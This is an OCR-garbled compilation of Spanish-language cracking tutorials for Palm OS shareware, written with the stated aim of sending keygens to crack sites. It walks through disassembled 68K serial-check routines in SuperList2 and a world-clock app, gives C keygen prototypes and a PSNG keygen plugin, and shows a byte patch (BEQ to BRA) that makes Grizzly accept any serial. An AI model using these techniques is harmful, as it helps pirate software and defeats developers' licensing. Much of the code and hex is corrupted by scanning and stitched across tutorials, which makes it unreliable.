Después de que entre el Debuffer, D4 debería tener el serial real !!! 
convertimos hex 77BC a decimal -> 30652 


loading ficl 0-0 exte 

loading ficl utility classes 

debuffer 1.2 — loading... 

Blype "bye" to exit. Type "help" for online help. 
Mlaiting for debug event... (Ctrl1+C exits> 


.Pregs 


000022 F3 
ABBB77BC 
ABBBBBFF 
ABBBBBBA 
aBBBn77BC 
aBBBBBna”? 


ABBBBBBA 
ABB3DE8C2 
615/51515151515 
: MBB3CF24 
BBBACCCA 
2008 


: B6BB2B11 
: BBBB2B12 
: BBBB2BA6 
: BBBB2C2C 
: BBBACBCA 
: BBBB2BF4 
: BBB3CF38 


Hasta el próximo tutorial Amiguemos de lo ajeno : comentarios en 
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Mostraremos prototipo código fuente de un generador de parches 


Dificultad: X)NewBies ( )|ntermedio ( )Avanzado ( )Master ( )Gúru 


Herramientas: 


Palm CRACKER: Jaitobick FECHA: W/31/02/2005 


INTRODUCCION 


Paso a paso 
¿Ya estamos listos para ? 


.-Conseguiremos analizar código assembler de una aplicación. 

.-Conseguiremos que el Debuffer nos muestro un serial con protección HotSyncID 

.-Comprenderemos la rutina del Keygen ROM ID para generar el serial en 
Codewarrior For Palm Os 10. 

.-Obtendremos el serial con pocos HotSyncID con longitud > 10 caracteres como 

(german umlaut)... 

.-Rastrearemos la rutina del KeyGen con el depurador debuffer 2.1 y analizaremos 
el código que lo genera 

.-Si haz programado en C/C++, entonces puedes escribir una rutina propia del Keygen 
en Code Warrior for palm Os. A no ser por mí, prefiero primero escribir un 


"Prototype" en Delphi o VB, puedes usar Hb++ para Palm que es similar a 
Visual Basic y no requiere Runtime como AppForge Crossfire 
Cuando hayamos probado nuestro Keygen con varios HotSyncID generados con 
PSNG Plugin con Code Warrior entonces estaremos listos para enviar el keygen a 
las páginas de cracks. 


AL ATAQUE 
Plugging PSNG SDK2 para Code Warrior For Palm Os R3 


El número de serie de la palma Generator - la versión 2.0 ... 

ina traída para usted por el SPC 

Ésta es nuestra segunda liberación (2.0) de nuestra aplicación PSNG para la plataforma Palm. Esto le permitirá generar códigos basados basados en cosas 
como el HotSync User Name, ROM ID (probablemente no es soportado en que todos los modelos Palm), ó ID User. Si algúna otra otra entrada es 
requerida, entonces el autor del plugin proveerá una ventana de diálogo personalizada para obtener la entrada. 

Es una buena idea presionar el botón "Get Plugin Info" botón para saber que se necesita introducir. También para informarnos donde puedemos obtener 
mas warez. 

Hay muchas características nuevas en la versión 2. Ahora tiene Categories a fin de que los desarrolladores del plugins puedan crear plugins para Palm 
en , Macintosh, PC u Otras plataformas. Otro gran rasgo es la habilidad para generar una lista de números de serie. La lista será generada según la 
Categoria que hemos colocado. Se guardará en la Memo Pad y en partes de 4k si usted tiene un montón de plugins (para soporte de viejas unidades). 

El PSNGPlug SDK está disponible para que usted hackee plugins nuevos. (Sugerimos que se use) "Code Warrior para Palm OS R6" o la versión más 
nueva. Hay dos plantillas SDK. Un SDK simplista para cuando usted sólo necesite información básica como el HotSync Name. Es el método preferido 
porque no habrá necesidad para cualquier entrada especializada. Si un generador necesita información especializada, Para Macintosh SNG advertirá al 
usuario la información requerida. 

Que se diviertan. 

Una pareja de SPC krackers. 

postdata y recordandoo que: 


.. PSNG es para uso educativo y solo para propósitos de entretenimiento. 

Si usted verdaderamente goza cualesquiera de las aplicaciones finas que usted crea buenas. Cómprelos.. 

Para repetir lo dicho por uno de nuestros amigos: Creemos en soportar autores del shareware cuando resolvemos conservar una aplicación. Justamente 
odiamos estar limitados o que nos molesten con pruebas. 

Esta aplicación es Shareware: ¡Si a usted le gusta ello y lo usa, entonces compre algún shareware (Echa en cualquier plataforma!) 


E-U] Metrowerks 
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63 Documentation 
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23 Palm 0S 3.1 Support 

23 Palm 0S Emulator 

Palm OS Examples 

(23 Palm OS Extras 

23 Palm 0S Tutorials 
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23 PQA Builder culo 
4 Pang_sdk BR la] Psng.h 
EQ Custom la] PSNGPlug.c 
M- dead HS PSNGPlug.mcp 
xn Sam's Teach Yourself E Acid 
(3 Stationery ES e.lx 
4-03 Symbol SDK Support la] UtiLib.c 
6-03 Templates (aa] UtilLib.h 


CodeWarrior6 generate PSNG Plugin 


Now we would create the PalmOS PSNG Plugin with CodeWarrior6 
Let's start CodeWarrior6 and load the original PSNG Project.. 


Segments Targets 


Y E Source 

Y + PSNGPlug.c 
e E CWRuntime.c 
* Y Utilib.c 


set the Project Properties to our Traget.. 


¿+ Source Trees 
¿ B8K Target 
E Language Settings 
¿C/C++ Language 
¿- C¿C++ Wamings 
o Rez 
E+- Code Generation 
¿-- 68K Processor 
¿-- 68K Disassembler 
¿Global Optimization 
E Linker 
¿ 68K Linker 
: CFMBBK 
MN PalmRez Post Link 
E Editor 
¿Custom Keywords 
E+- Debugger 


Replace the DoCalc Function with our Code ... 


* FUNCTION: 
DESCRIPTION: 


PARAMETERS: 


RETURNED: 
REVISION HISTORY: 


Xx 
E 
Xx 
Xx 
x 
Xx 
x 
E 
X 
Xx 
Xx 
Xx 
Xx 
x 
x 
x 
x 
E 
Xx 


Dotalc 


This routine gets the HotSyncName, ROM ID é User ID from the P!- 
application. Do your stuff, copy the new string back into : 
the 'param-—->serial' variable which gets passed back and displa: 
PSNG application. 


Vers 1 plugs: from param (C string containing the name or seed 


Vers 2+ plugs: new paramerter block format. Ve now pas= the Hi 
ROM ID and User ID automatically. They are now stored on the 
"User Settings” in the main app. Be careful to pass the nev = 
into "param-—->string". 

You may create a custom form to get addional inputs for specia. 
like building a serial * generator for a Macintosh application. 


to: param->serial (€ string containing the code) 


FEIEIO III IE IE IE IE IE IE IE IE IE IE IE IE IE DEI IET IE IE IEEE IRENE HEHE IEA Y 


static int DoClalcí V2ApiGetSerialParam *param ) 


CharPtr 
CharPtr 
CharPtr 


unsigned long 
long 
Char 


hsname = param—->hotseyncNane: 
ronid = param->romID: 
userid = param->userlD:; 


theNun 
1, Xx: 
ch: 


E = Strlení hsnane ): // string length of our complete text string. 


for(i=0:1i 


< E: 14++ ) ( 


ch = hsname[i]: 
theNum = theNum + (unsigned long) ch: 


StrPrintFí param->serial, "%lx", theNum ): 


This is the DoCalc Function for SuperList2... 


CharPtr userid = param—->userlD: 


int 1; 

int count: 

char theName[30]: 
unsigned int theNum=0: 


// generate theNane first3 and last3 characters 
if (Strlení(hsname) > 6) 


theName[ 0] 
theName[1] 
theNanme[ 2] 
theName[ 3] 
theName[ 4] 

5] 

6] 


hsname[ 0]: 

hsname[1]: 

hsname[2]: 

hsname[ Strlení(h=snane)-3]: 
hsnane[Strleníhsname)-2]: 
hsname[Strlení(hsnane)-1] 
nO": 


theName[ 
theName[ 
F 


else 


í 
for (1=0;i<Strlení(hsnanme): 14++) 


theNane[i]=hsname[i]: 
theNane[i+1]='0':; 


; 


//f calculate sum of all char 
for (1=0;i<Strlení(theNane): 14++) 
theNum = theNum + theNanme[i]: 


StrPrintFí param->serial, theNane ): 
StrIToAí param->serial, theNun ): 
StrIToAí param->serial, Lencomputenane ): 
return Ú: 


LK TERCIO III IE IE III IE IE IE IE IE IE IE IE II IET IE IE III IE IE IE IE IE IE IE IE IE IE IE IE IE IET IE IE IE IE IE IE IET IEIEIEIE IE IE IE IE II III EEE 


Now we need to change the Function PlugEntry ... 


case PLUGIN_V2API_GET_APPNAME: 


¿£ (111 CHANGE ME 1!!!) 
StrCopyí ( CharPtr )param.,| "SuperList2 2.2a and up" |): “4 Put the Application name here. 
¿/ %%% DON'T FORGET to change the PalmRez Po= inker Outpu 1le name!!! *xxe 

break: 


case PLUGIN_V2API_GET_CATEGORY: 
1 
unsigned char *y = ( unsigned char * )param: 


/¿£ (111 CHANGE ME !!! 
*y =|PI_CAT PAIM: /£ This plugin vill be in the 


// 'Other' category AND the 'Mac' category 
// by ORing the tvo values. You can OR any or all cats. 


/*% From the Psng.h (header file), 4 —- categories. 


PI_CAT PAIM, Palm 

PI_CAT_ MAC, Macintosh 

PI CAT PC, PC Compatable 
PI_CAT_ OTHER Other 


ES 


break; 


1 
¿£ (111 CHANGE ME 1!!!) 
unsigned char *vy = ( unsigned char * )param: 
¿/ This plugin will generate 


¿/ or false /¿/ a serial * for the List command. 


, 


break; 


case PLUGIN_Y2API_GET_INFO: /¿/ put text up to 1024 character=. 
¿£ (111 CHANGE ME 1!!!) 
StrCopyí ( char * )param.| "vww.tapnsee.com/" 
'Sníc) 2000 by saerdna" 
"iSnof Palmvarez” 


"u xn " 

'SnynThis plug is for public." 
'SnTf you like it... buy 1t!” 
"iXnSupport sharevare!”): 


yeahh.. now we can MAKE our Project... press the make Button 


Segments Targets 


EG Source 
NO BPSNGPlug.c 


EY CwRuntime.c 
BY UtilLib.c 


Load the Psng2.prc and our new created Plugin into POSE 


Custom 
PSNGPlug_Data 


[1] SuperList2 PSNG.pdb 


"SuperList2 PSNG.pdb" "Psng2. pro” 
Palm OS Files (*.pre, *.pdb, *.pga] 
rn 


and calculate your serial... ;-) 


Keygenz Code Snippes 


Dear Reader... be aware... i'm not a C-programmer ;-) 
If you can do it better.... do it ! 


// generate cleanName strip special characters 


count=0; 
for (¡=0;i<StrLen(hsname); i++) 


( 
if ((hsnameli]>64 88 hsnameli]<91) || (hsnamel[i]>96 88 hsnameli]<123 )) 


( 
cleanName[count]=hsnameli]; 
count=count+1; 


) 


cleanName [count]="0'; 


// lowercase hsname 
StrToLower(theName, hsname); //convert to LowerCase 


// calculate sum(hsname) 
for (¡=0;i<StrLen(hsname); i++) 


theSum=theSum+hsnameli]; 


) 


// create UserName for compute the serial.. 
// first 5 char and last 5 character 


if (StrLen(hsname)>10) 

( 

for(i=0;i<5; i++) 

( 

computenamel[i]=hsnameli]; 
computename[9-i]=hsname[StrLen(hsname)-i-1]; 


computename[10]="0'; 
) 


else 


for(i=0;i<StrLen(hsname);i++) 

( 

computenamel[i]=hsnameli]; 
computename[StrLen(hsname)]="0'; 


// generate theName .. replace special characters with "Space" 
count=0; 
for (¡=0;i<StrLen(hsname); i++) 


if (asnamel[i]<123 88 hsnamel[i]>31 ) // no special character 
( 

theName[count]=hsnameli]; 

theName[count+1]="0'; 

count=count+1; 

) 

else 

( 
theName[count]=' '; // special char = "Space" 
theName[count+1]="0'; 

count=count+1; 


) 


) 


Esto es todo por el día de Hoy 
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INTRODUCCION 


Te toca investigar para que sirve esta aplicación 


AL ATAQUE 


Targetl -> SuperList2 
Iniciar con nuestro primer Target ... SuperList2 v2.2a de Tapnese 


Primer paso 


Iniciamos PRCEdit y analizamos el Codigo e investigamos la rutina Keygen 
hmmm allí hay 2 partes que necesitamos para calcular el código.. 


Parte 1 ... los cambios en nuestro HotsyncName 


Para completamente entender este código trazar con Debuffer 
Paso a paso a través de este Rutina, con pocos HotsyncNames;) 


000069%ba 
000069be 
000069c2 
000069c6 
000069c8 
000069ca 
000069cc 
000069ce 
00006942 
000069d4 
000069d8 
000069da 
000069de 
000069de 
000069e0 
000069e2 
000069e6 
000069e8 
000069ec 
000069ee 
000069f0 

00006912 

000069f4 

00006918 

000069fa 

000069fe 

00006200 
00006204 
00006208 
00006a0c 
00006a12 
00006a14 
00006a18 


4e56fttc 
48e711f30 
266e0008 
4243 
4245 
4244 
4207 
b6fc0000 
6604 
47faabec 
2f0b 
4e4fa0c7 


3200 
4246 
426effíe 
3001 
0c410006 
6102 

7006 
b046 

6f60 
43ec0930 
3444 
10320800 
e808 
1040ffff 
41ec0453 
342eftfe 
130020003000 
5243 
10320800 
740f 


L735 


L736 


1737 


1738 


LINK A6,+t-4 

MOVEM.L D3-D7/A2/A3,-(A7) 

MOVEA.L 8(A6),A3 

CLR.W D3 

CLR.W D5 

CLR.W D4 

CLR.B D7 

CMPA.W 40,A3 <- A3 nuestro completo HotsyncName 
BNE L736 

LEA L143,A3 

MOVE.L A3,-(A7) 

TRAP +15 

DC.W sysTrapStrLen 

MOVE.W DO,D1  <---La longitud de nuestro HotsyncName 
CLR.W D6 

CLR.W -2(A6) 

MOVE.W D1,DO 

CMPI.W +t6,D1  <--- Checa la longitud de nuestro HotsyncName con 6 
BLE L738 

MOVEQ +t6,DO0 

CMP.W D6,DO 

BLE L740 

LEA 2352(A4),A1 

MOVEA.W D4,A2 

MOVE.B 0(A2,A3.L),D0 <- DO = 1 Carácter de HotsyncName 
LSR.B +4,DO 

MOVE.B DO,-1(A6) 

LEA 1107(A4),A0 

MOVE.W -2(A6),D2 

MOVE.B 0(A0,D2.W),0(A1,D3.W) 

ADDQ.W +41,D3 

MOVE.B 0(A2,A3.L),D0 

MOVEQ +15,D2 


00006ata c082 AND.L D2,D0 

00006a1c 131008003000 MOVE.B 0(A0,DO.L),0(A1,D3.W) 

00006a22 5243 ADDQ.W +1,D3 

00006a24 13bc003a3000 MOVE.B +58!$3a,0(A1,D3.W) 

00006a2a 5243 ADDQ.W +1,D3 

00006a2c 41ec0470 LEA 1136(A4),A0 

00006a30 11b2b8005000 MOVE.B 0(A2,A3.L),0(A0,D5.W) 

00006a36 5245 ADDQ.W +41,D5 

00006a38 de32b800 L739 ADD.B 0(A2,A3.L),D7 

00006a3c 5244 ADDQ.W +H1,D4 <- D4 = D4 + 1 ..counter (Contador) 
00006a3e 0c410006 1740 CMPI.W 1t6,D1 <- D1 Longitud total del HotsyncName 
00006a42 6f0a BLE L739 <--- hmm checa si el HotsyncName es menor o igual a 6 
00006244 00440003 CMPIW +$3,D4 <--- D4 .. Contador <> 3 hmm 
00006a48 6604 BNE L739 

00006ata 3801 MOVE.W D1,D4 <--- D4 = Longitud del HotsyncName 
00006a4c 5744 SUBQ.W +t3,D4 <--- D4 =[ [Longitud del HotsyncNme] - 3 ]] 
00006ate 5246 ADDQ.W ++1,D6 

00006a50 6000ff94 BRA L737 <- jump Saltar 

00006a54 41ec0930 LEA 2352(A4),A0 <-3first 8 3last char in Hex 
00006a58 1007 MOVE.B D7,DO 

00006a5a e808 LSR.B 44,DO 

00006a5c 740f MOVEQ +15,D2 

00006a5e c082 AND.L D2,D0 

00006260 43ec0453 LEA 1107(A4),A1 

00006264 110108003000 MOVE.B 0(A1,D0.L),0(A0,D3.W) 

00006a6a 5243 1741 ADDQ.W +41,D3 

00006a6c 700f 1742 MOVEQ +15,D0 

00006a6e c087 AND.L D7,DO 

00006a70 1106108003000 MOVE.B 0(A1,D0.L),0(A0,D3.W) 

00006a76 42303001 CLR.B 1(A0,D3.W) 

00006a7a 41ec0470 LEA 1136(A4),A0 <-3first 8 3last carácter de nuestro HotsyncName 
00006a7e 42305000 CLR.B 0(A0,D5.W) 

00006a82 4a2e000c TST.B 12(A6) 

00006a86 6608 BNE L741 

00006a88 41ec0930 LEA 2352(A4),A0 

00006a8c 60000006 BRA L742 

00006a90 41ec0470 LEA 1136(A4),A0 <-3first 8 3last de nuestro HotsyncName 
00006a94 4cee0cf8fteO MOVEM.L -32(A6),D3-D7/A2/A3 

00006aga 4e5e UNLK A6 

00006a9c 4e75 RTS 

Conclusion 


¡Este Routine toma a nuestro HotsyncName e inspeccione si el largo del (HotsynName) es mayor a 6, si esto es cierto 
genera a un HotsyncName nuevo con los 3 primeros caracteres y con los últimos 3 caracteres , de otra manera toma el 
HotsyncName original! 


Parte 2 ... Calculo de la Rutina 


00006e06 4e560000 L760 
00006e0a 2f0a 
00006e0c 2103 
00006e0e 246e000a 
00006e12 4243 
00006e14 2f0a 
00006e16 4e4fa0c7 
00006e1ta 

00006eta 3040 
00006e1c 4241 
00006e1e b648 
00006e20 6412 
00006e22 7400 
00006e24 3401 


LINK A6,+0 

MOVE.L A2,-(A7) 

MOVE.L D3,-(A7) 

MOVEA.L 10(A6),A2 <--- Nuestro "Limpio" HotsyncName 
CLR.W D3 <- D3 =0 

MOVE.L A2,-(A7) 

TRAP +15 

DC.W sysTrapStrLen 

MOVEA.W DO,A0  <--- longitud de AO 
CLR.WD1<-D1=0 

CMP.W A0,D3 <----Longitud > D3 ? 
BCC L762 <--- Salta si es igual 
MOVEQ +0,D2 <- D2=0 
MOVE.WD1,D2  <---D2=D1 


00006e26 10322800 L761 |-> MOVE.B 0(A2,D2.L),D0  <---- DO = HotsyncName[D2] 
00006e2a 4880 | EXT.W DO 

00006e2c d640 | ADD.W D0,D3 <---- add ascii val to D3 

00006e2e 5241 I loop ADDQ.W ¿1,D1 <- Di = D1+1 


00006e30 b248 
00006e32 65f0 
00006e34 b66e0008 
00006e38 57c0 
00006e3a 4880 
00006e3c 4440 
00006e3e 262efff8 
00006e42 246effic 
00006e46 4e5e 
00006e48 4e75 
Conclusión 


| CMP.W A0,D1 <- D1 = length ? 
| BCS L761 <- Not Equal then jump 
|------ CMP.W 8(A6),D3 <- compare fakeSerial with realSerial 
1762 SEQ DO <- $0000FFFF if equal, else 0 
EXT.W DO 
NEG.W DO <- 1 if equal, else O 
MOVE.L -8(A6),D3 
MOVEA.L -4(A6),A2 
UNLK A6 
RTS 


Esta rutina calcula la suma del HotsyncName. 


Keygen C-Prototype 


Este es el código para generar un KeygenCode ) 


Si nunca has programado en lenguaje C (Como yo) Es buena idea usar el código de una versión de un Keygen de un 
programador experimentado y hacer las debidas modificaciones. 


// generate theName first3 and last3 characters 


// Generar el nombre de los primeros 3 y ultimos 3 caracteres 
if (StrLen(hsname) > 6) 
( 


else 


theName[0] = hsname[0O]; 

theName[1] = hsname[1]; 

theName[2] = hsname[2]; 

theName[3] = hsname[StrLen(hsname)-3]; 
theName[4] = hsname[StrLen(hsname)-2]; 
theName[5] = hsname[StrLen(hsname)-1]; 
theName[6] = 0"; 


for (i=0;¡<StrLen(hsname); i++) 


) 


theNameli]=hsnamelil; 
theNameli+1]=10'; 


// calculate sum of theName 


// Calcular la suma del nombre 
for (i=0;¡<StrLen(theName); i++) 
theNum = theNum + theNameli]; 


End Saludos. 
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PROTECCION: HotSync Name / Code Unlock 


Descripción: Aplicación que muestra las horas mundiales. 
Dificultad: (O) NewBies ( )Intermedio ( )Avanzado ( )Master ( )Gúru 
DOWNLOAD: http: //www.google. com 


Herramientas: SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


Palm CRACKER: FECHA: wW/31/02/2005 


INTRODUCCION 


Hay mejores aplicaciones como las que incluye las PDA Handspring ahora comprada por PalmOne donde se 
incluye un relos mejor, pero esta aplicación solo nos servira para aprender los misterios del Palm reversing. 


AL ATAQUE 
Primero paso 


Iniciamos PRCEdit y analizamos al Código y buscamos la rutina Keygen Hmm.. Es sólo una corta y pequeña Rutina. 


Rutina del Keygen 


Para entender completamente toda parte del código necesitamos usar el depurador 
Debuffer y seguirle la huella Paso a paso a través de esta Rutina, con pocos 
HotsyncNames. 


00006fde  4es6ftd6 L974 LINK A6 4-42 
00006fe2.  48e71e00 MOVEM.L D3-D6,-(A7) 

00006fe6 7200 MOVEQ +t0,D5 

00006feg 422eftd6 CLR.B -42(A6) 

00006fec 42a7 CLR.L -(A7) 

00006fee 427 CLR.L -(A7) 

00006ffO 486eftd6 PEA -42(A6) 

00006ff4 42a7 CLR.L -(A7) 

00006ft6 42a7 CLR.L -(A7) 

00006ff8 42a7 CLR.L -(A7) 

O0006ffa de4fa2a9 TRAP 4415 

00006ffe DC.W sysTrapDikGetSyncInfo 

00006ffe 486eftd6 PEA -42(A6) 

00007002 4e4fa0c7 TRAP 415 

00007006 DC.W sysTrapStrLen 

000070068 3000 MOVE.W DO,D6 <--- D6 = longitud(HotSyncName) 
00007008 7600 L975------1> MOVEQ +t0,D3 <---- contador 

00007002  Hef00ic LEA 28(A7),A7 

00007008 $020 BRA L978 

00007010  leeffd6 LEA -42(A6),A0 

00007014 10303000 MOVE.B 0(A0,D3.W),DO  <--- DO=HotSyncName[Contador] 
00007018 4880 loop EXT.W DO 

0000701ta U640tff ADDI.W +-971-$61,D0. <---- DO=D0-97 hmmm 
0000701te 3800 MOVE.W D0,D4 ¿Qué?, Sí DO < 97 ? 

00007020 “240 TST.W DO 

00007022  6c06 BGE L976 <---- DO >= 0 jump Saltar 
00007024 3004 | L976 MOVE.W D4,DO 

00007026 4440 1977 NEG.W DO 

00007028 $002 BRA L977 

0000702a. 3004 | L978 MOVE.W D4,DO 

00007020 IMD ADD.WD0,D5  <---D5=D5+D0 

0000702e 5243 ADDQ.W +41,D3  <---- counter = counter + 1 
00007030  b646 CMP.W D6,D3  <--- end of length(HotSyncName) ? 
00007032. $5de BCS L975 

00007034  700b MOVEQ +411,DO 


00007036 “tc5 MULS.WD5,DO <--- DO=D0*11 


00007038 0640001b 
0000703c b06e0008 L979 
00007040 6604 
00007042 7001 
00007044 601e 
00007046 486db97c 
0000704a 42a7 
0000704c 3f2e0008 
00007050 487a000e 
00007054 48720004 
00007058 0697tfffa13c 
0000705e 4e75 
Conclusión 


ADDI.W $t271$1b,DO <--- DO=D0 +27 
CMP.W 8(A6),D0  <---- comparar fakeSerial con realSerial ! 
BNE L979 

MOVEQ +1,DO0 

BRA L982 

PEA -18052(A5) 

CLR.L -(A7) 

MOVE.W 8(A6),-(A7) 

PEA L981 

PEA L980 

ADDI.L ++-24260!-$5€ec4,(A7) 

RTS 


Tal vez la Parte crítica de esta Rutina podría ser la Parte 00007018 - 00007018 cuando DO < 97 
Solamente si rastreamos el Código con el Debuffer, veremos que hay una fácil de solución J 


Keygen C-Prototype 


Ok.. Aquí esta mi Prototipo en lenguaje C para la rutina del Keygen. 


int counter = 0; 
unsigned int theNum=0; 


// calculate serial. 
for (counter=0;counter<StrLen(hsname);counter++) 


( 


if (asname[counter] > 97) 


theNum=theNum + (hsname[counter] - 97); 


else 


theNum=theNum + (97 - hsname[counter]); 


) 


theNumx=theNum * 11; 
theNum=theNum + 27; 
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(0) Serial ( )HotSync/ Code ( )Trial ( )Multiprotección ( )Encriptado ( )Otro 
Validar cualquier serial 


http://www.megasoft2000.com 


()NewBies ( )Intermedio ( )Avanzado ( ) Master ( )Gúru 


PRCedit, POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


INTRODUCCION 


Se trata que se valide cualquier serial introducido.La versión Grizzly_Palm_LR.PRC esta bien para trabajar. 


AL ATAQUE 


Primero Instalamos el programa objetivo en nuestra Palm real ó emulador, nos vamos a la ventana de registro e introducimos cualquier 
número, nos aparece una ventana con el siguiente mensaje ''Invalid registration code'' , bien ahora abrimos nuestra aplicación objetivo 
con PRCexplorer v1.0.18.5 y buscamos la Talt que nos muestra este mensaje , Encontramos que es la Talt ''0x270F" de paso también 
anotamos en una hoja de reciclaje el mensajes de registro valido que es ''0x270E" Con el mensaje ''Succesful registration! Thank 
you for support.'' Procedemos , Como ya es costumbre desensamblando con el PalmDemon v0.27 


Guardamos el desensamblado con extensión de text el ponemos el nombre Grizzly_Palm_LR Shareware.txt para que coincida con este 
tutorial, después lo haremos con el archivo modificado. Hacemos esto porque lo abriremos con Ultraedit que tiene más opciones de búsqueda 
precisa y tarda menos que el palmdemon, Una ves abierto el archivo desensamblado con ultraedit buscamos con Control+F la cadena 270f 
nos aparecen dos coincidencias, vamos a la que contiene X-ref to Alert (Registration) y caemos en 


00008C5A 3F 3C 27 OF MOVE.W $H$270F,-(A7) <--- Aquí caemos 


Veamos el siguiente trozo de código. 


00008C14 
00008C18 
00008C1A 
00008C1E 
00008C22 
00008C26 
00008C2A 


10 
EB 
48 
4É 
48 
48 
4É 


30 
22 
6ÉE 
4F 
6D 
6ÉE 
4F 


48 


6D 


ASL.B 


FF 
AO 
EB 
FF 
AO 


F6 
C5 
28 
FA 
C5 


MOVE 


.B $6D(A0, D4.W), DO 


D5, D2 


PEA. 


L LVAR_0A 


SysTrap StrCopy 
PEA.L VAR_14D8 


PEA. 


L SVAR_06 


SysTrap StrCopy 


00008C2E 
00008C32 
00008C36 


48 
48 
4É 


6ÉE 
6ÉE 
4F 


FF 
FF 
AO 


E6 
F6 
Cc7 


PEA. ] 
PEA. 


L SVAR_1A 


L LVAR_0A 


SysTrap StrLen <--- Longitud de algo 


00008C3A 58 4F ADD.W +$4, A7 

00008C3C 3F 00 MOVE.W DO, -(A7) 

00008C3E 48 6É FF F6 PEA.L LVAR_0A 
00008C42 4E 4F A2 F1 SysTrap EncDigestMD5 
00008C46 76 00 MOVE.L +$0, D3 

00008C48 47 ED FF 3A LEA.L VAR_C6, A3 
00008C4C 45 EE FF E6 LEA.L SVAR_1A, A2 
00008C50 4F EF 00 1A LEA.L $1A(A7), A7 


loc_8C54: 
00008C54 10 12 MOVE.B (A2), DO 
00008C56 BO 13 CMP.B (A3), DO <—-—-— Podríamos hacer que se compare así mismo 


00008C58 67 0C BEQ.S LOC_8C66 <-——Saltarse el mensaje de chico malo si es igual 
00008C5A 3F 3C 27 OF MOVE.W $$270EF,-(A7) <--- Mensaje de no registrado 


X-ref to Alert (Registration) <-- Función que llama a una Talt (Messagebox en Win32) 


00008C5E 4E 4F Al 92 SysTrap FrmAlert 
00008C62 54 4F ADD.W +*$2, A7 

00008C64 60 1C BRA.S LOC_8C82 

loc_8C66: 

00008C66 52 8B ADD.L +$$1, A3 

00008C68 52 8A ADD.L +$$1, A2 

00008C6A 52 43 ADD.W +$$1, D3 

00008C6€ 0C 43 00 10 CMP.W *+$0010, D3 
00008C70 6D E2 BLT.S LOC_8C54 

00008C72 1B 7C 00 01 MOVE.B F$7C, $1(A5) 
00008C76 EB 1C ROL.B +$$5, D4 

00008C78 3F 3C 27 OE MOVE.W H$270E, -(A7) <--- Mensaje de registrado 


X-ref to Alert (Registration) 


00008C7C 4E 4F Al 92 SysTrap FrmAlert 
00008C80 54 4F ADD.W +4$2, A7 
loc_8C82: 

00008C82 4C DF 


Bien Por hoy esta aplicación solo se limito a cambiar un BEQ por un BRA ó si quiere entenderlo mejor, deduzco que ya lo tiene en la mente 


el cambio que se hara, pero de cualquier manera ponemos 
00008C58 67 0C BEQ.S LOC_8C66 
Cambiar por: 


00008C58 60 0C BRA.S LOC_8C66 


Cambiamos el BEQ por el BRA por que cualquier número de serie se valido excepto cuando 
introduzcamos el serial valido nos mostrara la ventana de registro invalido (pero de aquí a 


serial valido 


que le atinemos tardaremos mucho), Si alguien tiene una manera de encontrar el 
pues que esperan en enviar su tutorial. 


En la figura de abajo podemos ver claramente el cambio que hicimos al cambiar un 67 (BEQ) por 


un 60 (BRA), y la manera en como se valida cualquier serial. 


C” UltraE dit-32 - C:-AMy DownloadsiGrizzly_Palm_LR.cracked.pre 


| Aárchivo Editar Buscar Proyecto Wer Formato Columna Macro Avanzado Ventana £yuda 


|| Grizaly_Palm_LR.cracked.pre | Grizzly_Palm_LA Shareware.pre 


AS 


DOOOSbHfO0h: 2F Al 35 

DOOO8<oO0h: 4E 73 25 64 56 

DOOO8ciOh: FF E? 10 30 4F 

DOOO08<20h: AD 6D EB 28 GE 

00008c30h: FF SE FF F6 SE Please enter the registration code 
DO008c40h: FF A2 Fl sent to you when you registered 
DOOO8Be5Oh: 4F (ou aL Un ale 67 3 la ] 0000 -0000. 
DOOD8có60h: Al 54 4F 60 1C y 

DOOO08<7?O0h: 6D 18 7c 00 01 

DOOO08<80h: 54 4C DF 0C€ 08 

00008<90h: 24 DO 08 Oc 52 tirao párten 
DOOD8ca0h: 04 27 1B 67 00 


A IS 


E AS Me 


DO0008bf0h: 2F Al 
00008<00h: 4E 25 
e [|O0OD08c10h: FF 10 
ll oo0008220h: A0 EB 
=|100008<30h: FF FF 
=/(00008<40h: FF AZ = 
=|[00008<50h: 4F 10 50 0C 3F 3C 27 ; O... EE o 
—/[f00008<60h: Al 60 ; ÍBTO” .RiRERC.C.. 
—/(00008<70h: 6D DO ; mÓ.|..0.?2<*.NOÍZ 
Millooooscesoh: 54 oc : TONÑ. Nomunv../. 
wlfooooss90h: 24 Dc : $n...R..£..x0%.. 
gq [fo0008ca0h: 04 67 so .0.q..-Ség..-.0 
=JL 
Si necesita ayuda, pulse F1 [Pos: 8c58H, 35928, CO [Dos | Mod.: 23/11/03 10:26:D6a.m. [Bytes Sel: 6 INES 


Después guardamos lo cambios como el archivo Grizzly_Palm_LR.cracked.prc despues nos encargaremos de parchar la rutina de las demas 
versiones Grizzly_para diferentes resoluciones de palms, que es la misma. 


Desensamblamos el archivo modificado y el archivo shareware y guardamos el desensamblado en archivo de texto, los abrimos con ultraedit , 
abrimos ventanas en forma horizontal y vemos las diferencias de intrucciones. 


€ UltraE dit-32 - C:1My DownloadsiGrizzly_Palm_LR.cracked .txt 


|| Archivo Editar Buscar Proyecto Wer Formato Columna Macro ¿Avanzado Wentana Ayuda 
||. Grizzly_Palm_LR.cracked .txt | Grizaly_Palm_LA Shareware .txt | 


S 


24 C-1My DownloadsiGrizzly_Palm_LR Shareware .txt 


13413 00008C48 47 ED FF 3A LEA.L VAR _C6, A3 

+“ 13414 D0O008c4Cc 45 EE FF E6 LEA.L SVAR lA, AZ 
IS4Is O0008c50 4F EF 00 1A LEA.IL S1A(A7), A7? 

Y li3a16 10c 8052: 

Olf1i39417 —o00008c54 10 12 MOVE. B (A2), DO 

(5//13418 O0008c56 BO 13 CMP.B (A3), DO 

10; 1113419 oDo0008c58 67 OC BEQ.S LOC_8C66 

13113420 D00D08C5A 3F 3C 27 OF MOVE. W H$270F, -(A7) 

bl 13421 

8 li3422 X-ref to Alert (Registration) 

[a 13423 

er 13424  — DOODOSC5E 4E 4F Al 92 SysTrap Frmálert 

A a 

Wo 4 C:AMy DownloadsiGrizzly _Palm_LR.cracked .txt 

A 13413 00008C48 47 ED FF 3A LEA.L VAR _C6, A 

13414 00008c4Cc 45 EE FF E6 LEA.L SVAR_1A, A2 
13415 0O0008c50 4F EF 00 1A LEA.IL S1IA(AF), A7? 

63 13416 loc 8054: 

= | [13417 00008c54 10 12 MOVE.B (AZ), DO 

= |[13418 00008c5é6 BO 13 CMP.B (A3), DO 

= 13419 | ooooscse 60 Dc BRA.S LOC_8C66 

